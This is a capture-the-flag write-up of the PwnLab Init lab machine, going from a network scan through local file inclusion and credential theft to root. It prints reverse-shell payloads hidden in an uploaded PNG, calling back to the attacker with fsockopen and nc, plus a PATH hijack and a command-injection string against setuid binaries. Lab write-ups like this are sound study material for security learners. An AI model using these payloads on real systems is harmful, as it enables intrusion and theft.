PwnLab Init – Writeup


This machine is,158/

Recon Phase

I started by locating my target within the network

root@kali:~# nmap -sn
Nmap scan report for
Host is up (0.00074s latency).
MAC Address: 0A:00:27:00:00:19 (Unknown)
Nmap scan report for
Host is up (0.00024s latency).
MAC Address: 08:00:27:D4:C9:3D (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.0022s latency).
MAC Address: 08:00:27:97:3F:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.77 seconds

From here I carried out a service discovery scan

root@kali:~# nmap -sV
Nmap scan report for
Host is up (0.0022s latency).
Not shown: 997 closed ports
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
111/tcp  open  rpcbind 2-4 (RPC #100000)
3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1
MAC Address: 08:00:27:97:3F:11 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds

Web App Exploitation

So I went to the web browser on

Screenshot 1

I tried going to the upload page at

Screenshot 2

I needed to be logged in so I went to

Screenshot 3

Here I noticed the page was loaded with a GET param called ?page, where the value was the page name without .php, si I could use it for local file inclusion of .php files. So I tried a php filter to extract the source code of the page

Screenshot 4


This was the source of the page in base64, which decoded to

$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
    $luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);
    if ($stmt->num_rows == 1)
        $_SESSION['user'] = $luser;
        header('Location: ?page=upload');
        echo "Login failed.";
    <form action="" method="POST">
    <label>Username: </label><input id="user" type="test" name="user"><br />
    <label>Password: </label><input id="pass" type="password" name="pass"><br />
    <input type="submit" name="submit" value="Login">

This revealed the database creds were in ./config.php, so using the same method I grabbed that files contents

Which decodes to

$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";

I now had the db creds, so I connect in

root@kali:~# mysql -h -p
Using the db password I found
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 45
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>

I could now look around

MySQL [(none)]> show databases;
| Database           |
| information_schema |
| Users              |
2 rows in set (0.01 sec)
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
| Tables_in_Users |
| users           |
1 row in set (0.00 sec)
MySQL [Users]> select * from users;
| user | pass             |
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
3 rows in set (0.00 sec)

The passwords for the creds were just stored in base64, so the creds were


So I logged in as kent

Screenshot 5

I then tried to upload a php backdoor

Screenshot 6

So I can't upload php files, but I can upload images with php in them, but I need a way of LFIing the png to get the php executed, so I looked around at more source code, this time the index page

Which decoded to

//Multilingual. Not implemented yet.
if (isset($_COOKIE['lang']))
// Not implemented yet.
<title>PwnLab Intranet Image Hosting</title>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
    if (isset($_GET['page']))
        echo "Use this server to upload and share image files inside the intranet";

It included a file based on a cookie value, with no protection against directory traversal, I can LFI any file I want to with this. So I took the php reverse shell from /usr/share/webshells/php/php-reverse-shell.php changed it to point to me and changed it's extension to .png, I then uploaded the png version

Screenshot 7

Screenshot 8

There was an error, so I checked out the source of upload.php

Which decoded to

if (!isset($_SESSION['user'])) { die('You must be log in.'); }
        <form action='' method='post' enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png");
        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        if(strpos($filetype,'image') === false) {
            die('Error 001');
        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        if(substr_count($filetype, '/')>1){
            die('Error 003');
        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');

It checked the mime type, but that's an easy enough bypass, I needed a real png file, so I downloaded the pwnlab logo

root@kali:~# wget
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 13027 (13K) [image/png]
Saving to: ‘pwnlab.png’
pwnlab.png                         100%[================================================================>]  12.72K  --.-KB/s    in 0.02s
2018-09-08 13:09:49 (772 KB/s) - ‘pwnlab.png’ saved [13027/13027]

I then edited it in vim to add the following code to the end

<?php $sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

Then tried to upload it

Screenshot 9

Screenshot 10

I then setup a listener

root@kali:~# nc -nvlp 4444

As it showed the image to me, from the url of the image I could get it's location

Screenshot 11

The route from the lang folder to the image was ../upload/f8c3fc737f057212414e67a22be29837.png so I needed to setup the lang cookie, I did so using a cookie editor

Screenshot 12

And refreshed the page

connect to [] from (UNKNOWN) [] 35003

It connected back, but closed instantly. So I changed the script at the end of the image to

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f"); ?>

Fired up another listener

root@kali:~# nc -nvlp 4444

I then deleted the old lang cookie to stop it firing the wrong script, then uploaded the new version of the image, which ended up being located at upload/f8c3fc737f057212414e67a22be29837.png so the new cookie value was ../upload/f8c3fc737f057212414e67a22be29837.png

Screenshot 13

I then refreshed the page, but the load hung, a good sign, then in the listener

connect to [] from (UNKNOWN) [] 35005
/bin/sh: 0: can't access tty; job control turned off

I had a shell

Priv Esc

I started by making it nicer

$ python -c "import pty;pty.spawn('/bin/bash')"

Then began enum

www-data@pwnlab:/var/www/html$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false

Noticing accounts that matched username I had creds for, I tried to change over

www-data@pwnlab:/var/www/html$ su kent

Using JWzXuBJJNy as the password


As kent I took a look around

kent@pwnlab:/home$ cd ~
kent@pwnlab:~$ ls -la
drwxr-x--- 2 kent kent 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kent kent  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kent kent 3515 Mar 17  2016 .bashrc
-rw-r--r-- 1 kent kent  675 Mar 17  2016 .profile
kent@pwnlab:~$ cd ..

Nothing here, so I tried mike

kent@pwnlab:/home$ su mike

Using "SIfdsTEn6I" as the password

su: Authentication failure

That didn't work, so I tried kane

kent@pwnlab:/home$ su kane

using iSv5Ym2GRo

kane@pwnlab:~$ ls -la
drwxr-x--- 2 kane kane 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile

A file called msgmike with setuid as mike, so I took a look at it

kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

Then tried to run it

kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory

Weird, more inspection needed

kane@pwnlab:~$ strings msgmike
cat /home/mike/msg.txt

It uses a non absolute path for cat, so I can add my own program named cat to the PATH variable and it will use that as mike, so I set it up to open a shell

kane@pwnlab:~$ cd /tmp
kane@pwnlab:/tmp$ echo "/bin/sh" > cat

Then made it executable

kane@pwnlab:/tmp$ chmod +x cat

Added tmp to path so it would be used

kane@pwnlab:/tmp$ export PATH=/tmp:$PATH

And ran the program

kane@pwnlab:/tmp$ ~/msgmike

This spawned me a new shell

$ whoami
$ python -c "import pty;pty.spawn('/bin/bash')"

Now I'm mike I looked around some more

mike@pwnlab:~$ cd /home/mike
mike@pwnlab:/home/mike$ ls -la
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile

Another setuid, this time to root, I inspected this one too

mike@pwnlab:/home/mike$ strings msg2root
Message for root:
/bin/echo %s >> /root/messages.txt

This time the path was hardcoded so I couldn't replace it. But I could inject further commands into it by concatenating them

mike@pwnlab:/home/mike$ ./msg2root
Message for root:

I put

hi; sh

Which popped me a new shell

# whoami

I could now get the flag

# cd /root
# ls -la
drwx------  2 root root 4096 Mar 17  2016 .
drwxr-xr-x 21 root root 4096 Mar 17  2016 ..
lrwxrwxrwx  1 root root    9 Mar 17  2016 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
----------  1 root root 1840 Mar 17  2016 flag.txt
lrwxrwxrwx  1 root root    9 Mar 17  2016 messages.txt -> /dev/null
lrwxrwxrwx  1 root root    9 Mar 17  2016 .mysql_history -> /dev/null
-rw-r--r--  1 root root  140 Nov 19  2007 .profile

As I replaced the cat command available in PATH I had to use a direct path

# /bin/cat flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)I
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For  (__  _)
( _ __)                       - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'

The machine was done!

